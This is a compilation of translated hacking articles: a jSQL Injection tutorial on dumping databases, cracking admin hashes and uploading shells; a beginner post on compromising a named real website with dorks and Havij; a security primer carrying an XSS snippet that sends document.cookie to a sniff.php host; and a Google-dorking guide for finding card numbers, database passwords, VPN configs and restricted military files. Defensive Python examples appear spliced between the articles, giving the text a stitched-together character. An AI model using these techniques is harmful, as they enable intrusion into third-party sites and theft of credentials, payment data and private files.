Instructions for using jSQL Injection, a multifunctional tool for finding and exploiting SQL injections in Kali Linux.

Run the downloaded file by double-clicking it (a Java virtual machine must be installed).

3. Anonymity when checking the site for SQL injections
Setting up Tor and Privoxy in Kali Linux

[Section under development]

Setting up Tor and Privoxy on Windows

[Section under development]

jSQL Injection proxy settings

[Section under development]

4. Checking the site for SQL injection with jSQL Injection

Working with the program is extremely simple. Just enter the site address and press ENTER.

The following screenshot shows that the site is vulnerable to three types of SQL injections at once (information about them is indicated in the lower right corner). By clicking on the names of the injections, you can switch the method used:

The existing databases have also already been listed.

You can see the contents of each table:

Usually, the most interesting part of the tables is the administrator credentials.

If you are lucky and have found the administrator's credentials, it is still too early to celebrate: you also need to find the admin panel where those credentials can be entered.

5. Searching for admin panels with jSQL Injection

To do this, go to the next tab. Here a list of likely admin panel addresses is offered, and you can select one or more pages to check:

The convenience is that you do not need to use other programs.

Unfortunately, careless programmers who store passwords in clear text are not that common. Quite often the password field holds something like

8743b52063cd84097a65d1633f5c74f5

This is a hash. It cannot be reversed directly, but the original password can be recovered by brute force. And… jSQL Injection has a built-in brute-forcer.

6. Brute-forcing hashes with jSQL Injection

The undoubted convenience is that you do not need to look for other programs. Many of the most popular hash types are supported.

This is not the best option, though. To become a guru at recovering passwords from hashes, the book "" (in Russian) is recommended.

But, of course, when there is no other program at hand or there is no time to study, jSQL Injection with a built-in brute-force function will come in handy.

There are settings: you can choose which characters the password may contain and the range of password lengths.

7. File operations after SQL injection detection

In addition to database operations (reading and modifying them), once an SQL injection has been found the following file operations can be performed:

  • reading files on the server
  • uploading new files to the server
  • uploading shells to the server

And all this is implemented in jSQL Injection!

There is a limitation: the SQL server must have file privileges. Reasonable system administrators disable them, and then the file system cannot be reached.

It is easy enough to check for file privileges. Go to one of the tabs (reading files, creating a shell, uploading a new file) and try to perform one of those operations.

Another very important note: we need to know the exact absolute path of the file we are going to work with, otherwise nothing will work.

Look at the following screenshot:

Any attempt to operate on a file is answered with: No FILE privilege. Nothing can be done here.

If instead you have another error:

Problem writing into [directory_name]

This means that the absolute path where you want to write the file was specified incorrectly.

To guess a plausible absolute path, you must at least know which operating system the server runs. To find out, switch to the Network tab.

An entry like this (the string Win64) gives reason to assume we are dealing with Windows:

Keep-Alive: timeout=5, max=99
Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6
Connection: Keep-Alive
Method: HTTP/1.1 200 OK
Content-Length: 353
Date: Fri, 11 Dec 2015 11:48:31 GMT
X-Powered-By: PHP/7.0.0RC6
Content-Type: text/html; charset=UTF-8

Here we have some Unix (*BSD, Linux):

Transfer-Encoding: chunked
Date: Fri, 11 Dec 2015 11:57:02 GMT
Method: HTTP/1.1 200 OK
Keep-Alive: timeout=3, max=100
Connection: keep-alive
Content-Type: text/html
X-Powered-By: PHP/5.3.29
Server: Apache/2.2.31 (Unix)

And here we have CentOS:

Method: HTTP/1.1 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/
Connection: keep-alive
X-Cache-Lookup: MISS from t1.hoster.ru:6666
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.4.37
X-Cache: MISS from t1.hoster.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Date: Fri, 11 Dec 2015 12:08:54 GMT
Transfer-Encoding: chunked
Content-Type: text/html; charset=WINDOWS-1251
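The three header sets above, re-typed as constructed input, run through a small check that reports what a Server or X-Powered-By header discloses. This is an added example, not jSQL Injection's code; the parsing rules, the platform token table and the HARDENED_HEADERS sample are assumptions.

```python
"""Report OS and version disclosure in HTTP response headers.

Added example, not from jSQL Injection or the original article. The first
three samples are the responses quoted above, one header per line; the
hardened sample and the classification rules are assumptions.
"""
import re

# Constructed samples taken from the page's screenshots.
WINDOWS_HEADERS = """Keep-Alive: timeout=5, max=99
Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6
Connection: Keep-Alive
X-Powered-By: PHP/7.0.0RC6
Content-Type: text/html; charset=UTF-8"""

UNIX_HEADERS = """Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.29
Server: Apache/2.2.31 (Unix)"""

CENTOS_HEADERS = """Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.4.37
Content-Type: text/html; charset=WINDOWS-1251"""

# Assumed hardened response: product name only, no version, no OS, no X-Powered-By.
HARDENED_HEADERS = """Server: Apache
Content-Type: text/html; charset=UTF-8"""

# Tokens in the Server header's parenthesised comment that reveal the platform.
PLATFORM_HINTS = {
    "win64": "Windows", "win32": "Windows",
    "unix": "Unix-like", "centos": "Linux (CentOS)", "ubuntu": "Linux (Ubuntu)",
    "debian": "Linux (Debian)", "red hat": "Linux (Red Hat)", "freebsd": "FreeBSD",
}


def parse_headers(raw):
    """Split 'Name: value' lines into a dict keyed by lower-cased header name."""
    headers = {}
    for line in raw.splitlines():
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def disclosure_report(raw):
    """Return the platform guess, every product/version pair, and findings."""
    headers = parse_headers(raw)
    server = headers.get("server", "")
    report = {"platform": None, "versions": [], "findings": []}

    # The OS hint lives in the parenthesised comment: "Apache/2.4.17 (Win64)".
    comment = re.search(r"\(([^)]*)\)", server)
    if comment:
        text = comment.group(1).lower()
        for token, platform in PLATFORM_HINTS.items():
            if token in text:
                report["platform"] = platform
                report["findings"].append("Server header reveals OS: " + comment.group(1))
                break

    # Any product/version pair ("Apache/2.4.17", "PHP/7.0.0RC6") is version disclosure.
    for value in (server, headers.get("x-powered-by", "")):
        for product, version in re.findall(r"([A-Za-z][\w-]*)/([\w.]+)", value):
            pair = product + "/" + version
            if pair not in report["versions"]:
                report["versions"].append(pair)
    if report["versions"]:
        report["findings"].append("version disclosure: " + ", ".join(report["versions"]))
    return report


if __name__ == "__main__":
    for label, raw in [("windows", WINDOWS_HEADERS), ("unix", UNIX_HEADERS),
                       ("centos", CENTOS_HEADERS), ("hardened", HARDENED_HEADERS)]:
        print(label, disclosure_report(raw))
```

On Apache the hardened form corresponds to ServerTokens Prod, and the X-Powered-By line disappears with expose_php = Off in php.ini.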

On Windows, a typical site folder is C:\Server\data\htdocs\. But in fact, if someone "thought" of running a server on Windows, that person very likely has never heard of privileges. So you should start by trying the C:\Windows\ directory directly:

As you can see, everything went perfectly the first time.

But the jSQL Injection shells themselves raise my doubts. If you have file privileges, then you may well upload something with a web interface.

8. Bulk checking sites for SQL injections

And jSQL Injection has this feature too. Everything is extremely simple: load a list of sites (it can be imported from a file), select the ones you want to check and click the appropriate button to start.

Conclusions about jSQL Injection

jSQL Injection is a good, powerful tool for finding and then using SQL injections found on sites. Its undoubted advantages: ease of use, built-in related functions. jSQL Injection can be a beginner's best friend when analyzing websites.

Of the shortcomings, I would note the impossibility of editing databases (at least I did not find this functionality). As with all tools with a graphical interface, the inability to use in scripts can be attributed to the disadvantages of this program. Nevertheless, some automation is possible in this program too - thanks to the built-in mass site check function.

jSQL Injection is much more convenient to use than sqlmap. But sqlmap supports more kinds of SQL injection, has options for working around web application firewalls, and some other features.

Bottom line: jSQL Injection is a beginner hacker's best friend.

You can find help for this program in the Kali Linux Encyclopedia on this page: http://kali.tools/?p=706

And so, now I will talk about how to hack something without special knowledge of anything. I say right away, there is little benefit from this, but still.
First, you need to find the sites themselves. To do this, go to google.com and search for dorks


Here's a small selection. You can use your own. And so, we found a site. For example http://www.vestitambov.ru/
Next, download this program


Click OK. Then we insert the site of the victim.
We press start. Next, we are waiting for the results.
And so, the program found a SQL vulnerability.

Next, download Havij and paste the resulting link there: http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= . I won't explain how to use Havij or where to download it; it's not difficult to find. That's all. You have received the data you need, the administrator password, and then it's up to your imagination.

P.S. This is my first attempt at writing something. I'm sorry if it's wrong

I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started doing Frontend development. What is the problem?

Many novice developers are so absorbed in writing code that they completely forget about the security of their work. Most importantly, they forget about vulnerabilities such as SQL injection and XSS. They also pick easy passwords for their administrative panels and get brute-forced. What are these attacks and how can they be avoided?

SQL injection

SQL injection is the most common type of attack on databases; it is carried out through an SQL query aimed at a specific DBMS. Many people and even large companies suffer from such attacks. The cause is a developer's mistake in designing the database and, in fact, in writing the SQL queries.

An SQL injection attack is possible because of incorrect handling of input data used in SQL queries. If an attacker succeeds, you risk losing not only the contents of the databases but also the logins and passwords of the administrative panel. That data is quite enough to take over the site completely or make irreversible changes to it.

The attack can be reproduced in scripts written in PHP, ASP, Perl and other languages. Its success depends more on which DBMS is used and how the script itself is implemented. There are many sites in the world vulnerable to SQL injection. This is easy to verify: it is enough to enter "dorks", special search queries for finding vulnerable sites. Here are some of them:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

How to use them? It is enough to enter them into the Google or Yandex search engine. The search engine will give you not just a vulnerable site but the exact page with the vulnerability. But we will not stop there; we will make sure the page is really vulnerable. For this, it is enough to put a single quote (') after the value "id=1". Something like this:

  • inurl:games.php?id=1'

And the site will give us an error about the SQL query. What does our hacker need next?

He needs exactly this link to the page that produces the error. Then, in most cases, the work on the vulnerability takes place in the Kali Linux distribution with its utilities for this purpose: injecting the code and performing the necessary operations. How exactly this happens I cannot tell you, but you can find information about it on the Internet.
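The single-quote check described above, shown from the developer's side as an added example (not code from the article): a query built by string concatenation raises the database error the article talks about, while the same lookup with a validated, bound parameter treats the quote as data. The sqlite3 in-memory table and the function names are assumptions.

```python
"""Concatenated SQL beside its parameterised form.

Added example, not from the article. Uses Python's sqlite3 with a constructed
in-memory 'games' table standing in for a games.php?id= page.
"""
import sqlite3

# Constructed sample rows.
SAMPLE_ROWS = [(1, "chess"), (2, "go"), (3, "backgammon")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE games (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO games VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_unsafe(conn, raw_id):
    """Vulnerable: the request parameter is pasted straight into the statement."""
    sql = "SELECT title FROM games WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, raw_id):
    """Hardened: validate the type, then bind the value as a parameter."""
    try:
        game_id = int(raw_id)  # an id is an integer; anything else is rejected
    except ValueError:
        return []
    sql = "SELECT title FROM games WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (game_id,))]


def probe(lookup, raw_id):
    """Run one lookup and report either its rows or the database error it raised.

    A syntax error escaping from the unsafe version is the 'error about the
    SQL query' that marks a page as vulnerable; in the safe version the quote
    never reaches the SQL parser.
    """
    conn = make_db()
    try:
        return {"rows": lookup(conn, raw_id), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": type(exc).__name__}
    finally:
        conn.close()


if __name__ == "__main__":
    for raw in ("1", "1'"):
        print(repr(raw), "unsafe:", probe(lookup_unsafe, raw), "safe:", probe(lookup_safe, raw))
```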

XSS Attack

This type of attack targets cookies. Users, in turn, love to have them saved. Why not? How could we do without them? After all, thanks to cookies we do not type in a password for Vk.com or Mail.ru a hundred times, and few people refuse them. But on the Internet a rule often works in the hacker's favour: convenience is directly proportional to insecurity.

To implement an XSS attack, our hacker needs JavaScript knowledge. The language at first glance is very simple and harmless, because it does not have access to computer resources. A hacker can work with JavaScript only in a browser, but that's enough. After all, the main thing is to enter the code into the web page.

I won't go into detail about the attack process. I will tell only the basics and the meaning of how this happens.

A hacker can add JS code to some forum or guestbook:

document.location.href="http://192.168.1.7/sniff.php?test"

The script redirects us to an infected page where code will be executed: a sniffer, some kind of storage, or an exploit that will somehow steal our cookies.

Why JavaScript? Because JavaScript handles web requests well and has access to cookies. But if our script sends the user to some other site, the user will easily notice. So the hacker uses a more cunning option: he simply puts the code into an image.

var img = new Image();

img.src = "http://192.168.1.7/sniff.php?" + document.cookie;

We simply create an image and assign our script to it as an address.

How to protect yourself from all this? Very simple - do not follow suspicious links.
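The guestbook scenario above from the developer's side, as an added example (not code from the article): the same visitor text rendered raw and rendered escaped, plus the cookie flag that keeps document.cookie from exposing the session even when a script does run. The template, helper names and cookie attributes are assumptions; the payload is the article's own snippet.

```python
"""Stored XSS in a guestbook: raw interpolation beside escaped output.

Added example, not from the article. The guestbook template, helper names
and cookie attributes are assumptions; the payload is the article's snippet.
"""
import html

# Constructed guestbook entry carrying the article's cookie-stealing snippet.
PAYLOAD = ('<script>var img = new Image();'
           'img.src = "http://192.168.1.7/sniff.php?" + document.cookie;</script>')


def render_unsafe(entry):
    """Vulnerable: the visitor's text lands in the page as live markup."""
    return '<div class="entry">' + entry + '</div>'


def render_safe(entry):
    """Hardened: escape so the browser displays the text instead of running it."""
    return '<div class="entry">' + html.escape(entry, quote=True) + '</div>'


def session_cookie_header(session_id, http_only=True):
    """Set-Cookie line for the session cookie.

    HttpOnly hides the value from document.cookie, so even a script that does
    run cannot send it to sniff.php; Secure and SameSite limit other misuse.
    """
    flags = ["Path=/", "Secure", "SameSite=Lax"]
    if http_only:
        flags.append("HttpOnly")
    return "Set-Cookie: PHPSESSID=" + session_id + "; " + "; ".join(flags)


def contains_active_script(rendered):
    """Does the rendered HTML still carry a raw <script> tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
    print(session_cookie_header("constructed-session-id"))
```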

DoS and DDoS Attacks

DoS (from the English Denial of Service) is a hacker attack on a computer system with the aim of making it fail: creating conditions under which legitimate users of the system cannot access the resources it provides (servers), or can do so only with difficulty. The failure of the system can also be a step towards taking it over if, in the emergency, the software gives out critical information: for example, the version, part of the program code, and so on. But most often it is a means of economic pressure: downtime of a service that generates income, bills from the provider, and the measures needed to fend off the attack hit the "target" hard in the pocket. DoS and DDoS attacks are currently the most popular, as they allow almost any system to be brought down without leaving legally significant evidence.

What is the difference between DoS and DDoS attacks?

DoS is an attack built in a smart way. For example, if the server does not check the correctness of incoming packets, then a hacker can make such a request that will be processed forever, and there will not be enough processor time to work with other connections. Accordingly, customers will receive a denial of service. But it will not work to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can easily cope with such an overload.

DDoS is actually the same attack as DoS. But if in DoS there is one request packet, then in DDoS there may very well be hundreds or more of them. Even heavy-duty servers may not be able to cope with such an overload. I'll give you an example.

A DoS attack is when you are having a conversation with someone and some ill-mannered person comes up and starts shouting loudly. Talking becomes impossible or very difficult. Solution: call security, who will calm the person down and take him out of the room. A DDoS attack is when thousands of such ill-mannered people run in. In this case the guards will not be able to restrain and remove everyone.

DoS and DDoS attacks are carried out from so-called zombie computers: users' machines hacked by attackers, whose owners do not even suspect that their machine is taking part in an attack on some server.

How to protect yourself from this? In general, there is no way to rule it out. But you can make the attacker's task harder by choosing good hosting with powerful servers.

Brute force attack

A developer can come up with many protections against attacks, fully review the scripts he has written, check the site for vulnerabilities, and so on. But when it comes to the last step of building the site, namely setting a password on the admin panel, he can forget about one thing. The password!

It is strongly not recommended to set a simple password. It can be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you may be subject to the most common and not complex attack - Brute Force.

Brute force is a password-guessing attack using special programs and dictionaries. Dictionaries can vary: Latin letters, numbers up to some range, mixed (Latin + numbers), and there are even dictionaries with special symbols @#4$%&*~~`'"\? and so on.

Of course, this type of attack is easy to avoid. It is enough to come up with a complex password. Even a captcha can save you. Also, if your site is built on a CMS, many of them detect this kind of attack and block the IP. Always remember that the more different characters a password contains, the harder it is to guess.

How do hackers work? In most cases they either suspect or already know part of the password. It is quite logical to assume that a user's password will not consist of 3 or 5 characters; such passwords lead to frequent break-ins. Basically, hackers take a range of 5 to 10 characters and add a few characters they probably know in advance. Then they generate passwords within the desired ranges. The Kali Linux distribution even has programs for such cases. And voila, the attack no longer takes long, since the dictionary is no longer so large. In addition, a hacker can use the power of the video card. Some of them support CUDA, and the guessing speed increases by as much as 10 times. So an attack in such a simple way is quite real. And not only sites are subjected to brute force.
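The defensive side of this section, together with the 32-hex-character value shown in the jSQL section, as an added example (not code from any of the articles): an unsalted MD5 gives the same value for the same password everywhere, which is why known hash-password pairs work against it, while a salted, iterated PBKDF2 record does not, and the keyspace function shows how the length range and character set from the article scale the attacker's work. The record format, iteration count and function names are assumptions.

```python
"""Unsalted MD5 beside salted PBKDF2 password storage, plus keyspace sizing.

Added example, not from any of the articles. Standard library only; the
record format 'pbkdf2_sha256$iterations$salt$hash' and the iteration count
are assumptions.
"""
import hashlib
import hmac
import os
import re

PBKDF2_ITERATIONS = 600_000  # assumption: a present-day cost, to be raised over time
MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def looks_like_unsalted_md5(value):
    """The shape of the value in the article's password column: 32 hex digits."""
    return bool(MD5_HEX.match(value.strip().lower()))


def md5_hex(password):
    """Unsalted MD5: identical input gives an identical, precomputable value."""
    return hashlib.md5(password.encode()).hexdigest()


def make_record(password, salt=None):
    """Return a storable record; a fresh random salt is drawn unless one is given."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), digest.hex())


def verify(password, record):
    """Recompute with the stored salt and iterations; compare in constant time."""
    algo, iterations, salt_hex, hash_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), hash_hex)


def keyspace(charset_size, min_len, max_len):
    """Number of candidates for every length in [min_len, max_len]."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def seconds_to_exhaust(charset_size, min_len, max_len, guesses_per_second):
    """Worst-case time to try the whole keyspace at a given guessing rate."""
    return keyspace(charset_size, min_len, max_len) / guesses_per_second


if __name__ == "__main__":
    rec = make_record("correct horse battery staple")
    print(rec)
    print("verify ok:", verify("correct horse battery staple", rec))
    # Lowercase letters + digits (36 symbols), lengths 5 to 10, at a CPU rate vs 10x GPU rate.
    for rate in (1e6, 1e7):
        print("36 symbols, 5..10 chars at %.0e/s: %.1f days"
              % (rate, seconds_to_exhaust(36, 5, 10, rate) / 86400))
```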

Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the biggest vulnerability is a person who can always be distracted somewhere or overlook somewhere. We are programmers, but not programmed machines. Be always on the alert, because the loss of information threatens with serious consequences!

Receiving private data does not always mean hacking - sometimes it is published in the public domain. Knowing the Google settings and a little ingenuity will allow you to find a lot of interesting things - from credit card numbers to FBI documents.

WARNING All information is provided for informational purposes only. Neither the editors nor the author are responsible for any possible harm caused by the materials of this article.

Everything is connected to the Internet today, with little care taken to restrict access. As a result, a lot of private data falls prey to search engines. Spider robots are no longer limited to web pages; they index all content reachable on the Web and constantly add confidential information to their databases. Learning these secrets is easy: you just need to know how to ask for them.

Looking for files

In capable hands, Google will quickly find everything that is badly protected on the Web, such as personal information and files for official use. They are often hidden like a key under a doormat: there are no real access restrictions, the data just lies in a corner of the site that no links lead to. The standard Google web interface provides only basic advanced search settings, but even these will be enough.

There are two operators you can use to restrict Google searches to files of a certain type: filetype and ext. The first selects the format that the search engine determined from the file header, the second the file extension, regardless of the internal content. In both cases you specify only the extension. Initially, the ext operator was convenient in cases where the file had no distinctive format features (for example, for searching ini and cfg configuration files, which can contain anything). Google's algorithms have since changed, and there is no visible difference between the operators: the results are the same in most cases.


Filtering the output

By default, Google searches for the entered words, and in general for any entered characters, across all files on indexed pages. You can limit the search scope by top-level domain, by a specific site, or by the location of the desired sequence within the files themselves. For the first two options the site operator is used, followed by the name of the domain or the chosen site. In the third case, a whole set of operators allows you to search in service fields and metadata. For example, allinurl finds the given words in the links themselves, allinanchor in the link text, allintitle in the page titles, allintext in the body of the pages.

For each operator there is a lighter version with a shorter name (without the all prefix). The difference is that allinurl finds links containing all the words, while inurl requires only the first of them to be in the link; the second and subsequent words of the query may appear anywhere on the page. The inurl operator also differs from another operator with a similar meaning, site: inurl additionally allows you to find any sequence of characters in the link to the desired document (for example, /cgi-bin/), which is widely used to find components with known vulnerabilities.

Let's try it in practice. We take the allintext filter and make the query return a list of credit card numbers and verification codes that expire only after two years (or when their owners get tired of paying for everyone).

allintext: card number expiration date /2017 cvv

When you read on the news that a young hacker "hacked into the servers" of the Pentagon or NASA, stealing classified information, then in most cases it is precisely this elementary technique of using Google. Suppose we are interested in a list of NASA employees and their contact details. Surely such a list is in electronic form. For convenience or due to an oversight, it can also lie on the organization's website itself. It is logical that in this case there will be no references to it, since it is intended for internal use. What words can be in such a file? At least - the field "address". It is easy to test all these assumptions.


inurl:nasa.gov filetype:xlsx "address"


We use bureaucracy

Such finds are a pleasant trifle. The really solid catch comes from a more detailed knowledge of Google Webmaster Operators, the Web itself, and the structure of what you're looking for. Knowing the details, you can easily filter the output and refine the properties of the files you need in order to get really valuable data in the rest. It's funny that bureaucracy comes to the rescue here. It produces typical formulations that make it convenient to search for secret information that has accidentally leaked onto the Web.

For example, the Distribution statement stamp, which is mandatory in US Department of Defense paperwork, denotes standardized restrictions on the distribution of a document. The letter A marks public releases in which there is nothing secret; B is intended for internal use only, C is strictly confidential, and so on up to F. Separately there is the letter X, which marks especially valuable information that constitutes a state secret of the highest level. Let those whose job it is look for such documents; we will limit ourselves to files with the letter C. According to DoDI 5230.24, this marking is assigned to documents containing descriptions of critical technologies that fall under export control. You can find such carefully guarded information on sites in the .mil top-level domain allocated to the US military.

"DISTRIBUTION STATEMENT C" inurl:navy.mil

It is very convenient that only sites from the US Department of Defense and its contract organizations are collected in the .mil domain. Domain-limited search results are exceptionally clean, and the titles speak for themselves. It is practically useless to search for Russian secrets in this way: chaos reigns in the .ru and .rf domains, and the names of many weapons systems sound like botanical (PP "Kiparis", self-propelled guns "Acacia") or even fabulous (TOS "Pinocchio").


By carefully examining any document from a site in the .mil domain, you can see other markers to refine your search. For example, a reference to the export restrictions "Sec 2751", which is also convenient to search for interesting technical information. From time to time, it is removed from official sites, where it once appeared, so if you can’t follow an interesting link in the search results, use the Google cache (cache operator) or the Internet Archive website.

We climb into the clouds

In addition to accidentally declassified documents from government departments, links to personal files from Dropbox and other storage services that create "private" links to publicly published data occasionally turn up in the Google cache. It is even worse with alternative and home-made services. For example, the following query finds the data of all Verizon customers who have a router with an FTP server enabled and actively used.

allinurl:ftp://verizon.net

There are now more than forty thousand such users, and in the spring of 2015 there were an order of magnitude more. Instead of Verizon.net you can substitute the name of any well-known provider, and the more famous it is, the larger the catch can be. Through the router's built-in FTP server you can see the files on an external drive connected to it. Usually this is a NAS for remote work, a personal cloud, or some kind of peer-to-peer download store. All the content of such media is indexed by Google and other search engines, so files stored on external drives can be reached via a direct link.

Peeping configs

Before the wholesale migration to the clouds, simple FTP servers, which had no shortage of vulnerabilities of their own, ruled as remote storage. Many of them are still in use today. For example, the popular WS_FTP Professional program stores configuration data, user accounts and passwords in the ws_ftp.ini file. It is easy to find and read because all entries are stored in plain text and the passwords are encrypted with the Triple DES algorithm after minimal obfuscation. In most versions, simply discarding the first byte is sufficient.

Decrypting such passwords is easy using the WS_FTP Password Decryptor utility or a free web service.

When people talk about hacking an arbitrary site, they usually mean getting a password from logs and backups of CMS or e-commerce application configuration files. If you know their typical structure, you can easily specify the keywords. Lines like those found in ws_ftp.ini are extremely common. For example, Drupal and PrestaShop always have a user ID (UID) and a corresponding password (pwd), and all of it is stored in files with the .inc extension. You can search for them like this:

"pwd=" "UID=" ext:inc

We reveal passwords from the DBMS

In the configuration files of SQL servers, user names and email addresses are stored in clear text, and instead of passwords, their MD5 hashes are recorded. Decrypting them, strictly speaking, is impossible, but you can find a match among known hash-password pairs.

There are still DBMS setups that do not hash passwords at all. Their configuration files can simply be viewed in the browser.

intext:DB_PASSWORD filetype:env

With the advent of Windows servers, the place of configuration files was partly taken by the registry. You can search through its branches in exactly the same way, using reg as the file type. For example, like this:

filetype:reg HKEY_CURRENT_USER "Password"=

Don't Forget the Obvious

Sometimes it is possible to get to classified information with the help of data accidentally opened and caught by Google. The ideal option is to find a list of passwords in some common format. Only desperate people can store account information in a text file, a Word document, or an Excel spreadsheet, but there are always enough of them.

filetype:xls inurl:password

On the one hand, there are many ways to prevent such incidents: set adequate access rights in .htaccess, patch the CMS, avoid third-party scripts of unknown origin and close other holes. There is also the robots.txt exclusion file, which tells search engines not to index the files and directories listed in it. On the other hand, if the robots.txt on some server differs from the standard one, it immediately becomes clear what they are trying to hide there.

The directory listing on any site is preceded by the standard heading "Index of". Since it must appear in the title for technical reasons, it makes sense to restrict the search with the intitle operator. Interesting material can be found in the /admin/, /personal/, /etc/ and even /secret/ directories.

Follow the updates

Freshness is extremely important here: old vulnerabilities are closed very slowly, but Google and its search results are constantly changing. There is even a difference between the "last second" filter (&tbs=qdr:s at the end of the request URL) and the "real time" filter (&tbs=qdr:1).

Google also implicitly records the date of the last update of each file. Through the graphical web interface you can select one of the typical periods (hour, day, week, and so on) or set a date range, but this method is not suitable for automation.

From the address bar one can only guess that the output is limited with the &tbs=qdr: construct. The letter y after it limits results to one year (&tbs=qdr:y), m shows results for the last month, w for the week, d for the past day, h for the last hour, n for the last minute, and s for the last second. The very latest results just discovered by Google are found with the &tbs=qdr:1 filter.

If you need to write a clever script, it is useful to know that a date range is given to Google as Julian day numbers through the daterange operator. For example, this is how you can find PDF documents containing the word confidential uploaded between January 1st and July 1st, 2015.

Confidential filetype:pdf daterange:2457024-2457205

The range is specified as integer Julian day numbers without decimals. Converting them by hand from the Gregorian calendar is inconvenient; it is easier to use a date converter.
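The converter the text refers to, written out as an added example (not code from the article): Gregorian dates to integer Julian day numbers and back, and the daterange operator built from them for the query above. The function names are assumptions; the constant is derived in the comment.

```python
"""Gregorian date <-> Julian day number for Google's daterange operator.

Added example, not from the article. Standard library only; the helper names
are assumptions. The two dates used below are the ones the article converts.
"""
from datetime import date

# Offset between datetime.date.toordinal() and the Julian day number.
# date(2000, 1, 1).toordinal() is 730120 and its JDN is 2451545, so the
# difference is 1721425.
ORDINAL_TO_JDN = 1721425


def julian_day_number(d):
    """Integer Julian day number for a datetime.date (the day starting at noon)."""
    return d.toordinal() + ORDINAL_TO_JDN


def from_julian_day_number(jdn):
    """Inverse of julian_day_number."""
    return date.fromordinal(jdn - ORDINAL_TO_JDN)


def daterange_operator(start, end):
    """Build 'daterange:START-END' for an inclusive Gregorian date range."""
    if end < start:
        raise ValueError("end date precedes start date")
    return "daterange:%d-%d" % (julian_day_number(start), julian_day_number(end))


def google_query(terms, start, end):
    """Append the date range to free text and other operators."""
    return terms + " " + daterange_operator(start, end)


if __name__ == "__main__":
    print(google_query("confidential filetype:pdf", date(2015, 1, 1), date(2015, 7, 1)))
```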

Targeting and filtering again

In addition to specifying extra operators in the search query, they can be passed directly in the URL. For example, the filetype:pdf operator corresponds to the as_filetype=pdf parameter. In this way it is convenient to set any refinement. Say, results only from the Republic of Honduras are requested by adding cr=countryHN to the search URL, and only from the city of Bobruisk with gcs=Bobruisk. See the developer section for the complete list.

Google's automation tools are designed to make life easier but often add to the hassle. For example, the user's city is determined from the user's IP via WHOIS. Based on this, Google not only balances load between servers but also changes the search results. Depending on the region, different results for the same query will reach the first page, and some of them may turn out to be hidden entirely. To feel like a cosmopolitan and search for information as if from any country, add the country's two-letter code after the gl= parameter. For example, the code for the Netherlands is NL, while the Vatican and North Korea have no code of their own in Google.

Often search results are littered even after using a few advanced filters. In this case, it is easy to refine the query by adding a few exception words to it (each of them is preceded by a minus sign). For example, banking , names , and tutorial are often used with the word Personal. Therefore, cleaner search results will show not a textbook example of a query, but a refined one:

intitle:"Index of /Personal/" -names -tutorial -banking

Last Example

A sophisticated hacker is distinguished by the fact that he provides himself with everything he needs on his own. For example, a VPN is a convenient thing, but either expensive or temporary and with restrictions. Signing up for yourself alone is too expensive. It's good that there are group subscriptions, and with the help of Google it's easy to become part of a group. To do this, just find the Cisco VPN configuration file, which has a rather non-standard PCF extension and a recognizable path: Program Files\Cisco Systems\VPN Client\Profiles . One request, and you join, for example, the friendly staff of the University of Bonn.

filetype:pcf vpn OR Group

INFO Google finds configuration files with passwords, but many of them are encrypted or replaced with hashes. If you see strings of a fixed length, then immediately look for a decryption service.

The passwords are stored in encrypted form, but Maurice Massar has already written a program to decrypt them and provides it for free via thecampusgeeks.com.

With the help of Google, hundreds of different types of attacks and penetration tests are performed. There are many options, affecting popular programs, major database formats, numerous PHP vulnerabilities, clouds, and so on. Knowing exactly what you're looking for makes it much easier to get the information you need (especially the information you didn't intend to make public). Not only Shodan feeds interesting ideas, but any database of indexed network resources!